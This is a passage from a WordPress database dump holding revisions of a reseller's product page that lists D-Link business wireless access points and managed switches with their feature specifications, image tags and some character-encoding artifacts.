100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:23:40','2019-09-25 06:23:40','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0);
INSERT INTO `wpdp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (3390,1,'2019-09-25 14:24:05','2019-09-25 06:24:05','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ 